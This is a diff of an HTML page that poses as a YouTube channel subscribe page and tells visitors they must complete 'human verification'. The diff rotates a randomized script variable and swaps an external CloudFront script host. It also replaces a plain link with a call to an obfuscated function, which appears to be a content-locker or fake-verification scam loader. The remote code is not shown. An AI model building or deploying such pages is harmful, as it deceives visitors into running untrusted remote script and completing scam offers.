--- a/index.html
+++ b/index.html
@@ -4,9 +4,9 @@
 <meta content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1" name="viewport">
 <title>SUBSCRIBE</title>
   <script type="text/javascript">
-    var xaEEG_nmt_jxIfYc={"it":4249455,"key":"55d78"};
+    var NNMLq_Wij_IkJADc={"it":4249455,"key":"55d78"};
 </script>
-<script src="https://d224zw8q39rk4h.cloudfront.net/058a55e.js"></script>
+<script src="https://d3qborf6vf5lth.cloudfront.net/35596e9.js"></script>
 
 <!-- Chrome, Firefox OS and Opera -->
 <meta content="#f8f8f8" name="theme-color">
@@ -4675,8 +4675,8 @@ var monthFormat = ["January", "February", "March", "April", "May", "June", "July
 <h3 class="intro-title">SUBSCRIBE YOUTUBE CHANNEL</h3>
 <p class="intro-snippet">You need to complete human verification to subscribe our channel</p>
 <div class="intro-action">
-                  <a href="https://doctoredits.com/1118035/eco">SUBSCRIBE NOW</a>
-  <button onclick="_yi()">Click me!</button>
+                  <a href onclick="_Tt()"> SUBSCRIBE NOW</a>
+ 
                   </div>
 </div>
 </div>
